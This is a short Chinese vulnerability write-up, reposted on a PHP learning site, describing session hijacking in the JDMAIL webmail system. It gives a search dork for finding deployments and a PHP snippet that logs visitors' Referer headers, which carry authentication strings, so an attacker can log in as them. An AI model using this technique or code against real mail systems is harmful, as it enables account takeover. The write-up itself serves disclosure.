来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 金迪邮件系统,JDMAIL用户量很大,官方案例:http: www mailer com cn Products6 htmlhttp: www mailer com cn New%20Customers index1 htm利用证明:关键字:intitle:金笛邮件管理系统http: mail lyx928 com...
金迪邮件系统,JDMAIL 0x001 任意用户劫持
内容中加入了超链接:
此超链接的内容为: <?php file_put_contents("referer.txt", " ref:".$_SERVER["HTTP_REFERER"], FILE_APPEND); file_put_contents("referer.txt", " IP:".$_SERVER["REMOTE_ADDR"], FILE_APPEND); file_put_contents("referer.txt", " Time:".date("Y.m.d H:i:s")."\r\n",FILE_APPEND); ?>
成功获取了Referer,以及url中的认证字符串。
成功登陆劫持到的用户,很Easy!
漏洞修补建议: 1、加强用户登陆状态验证
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com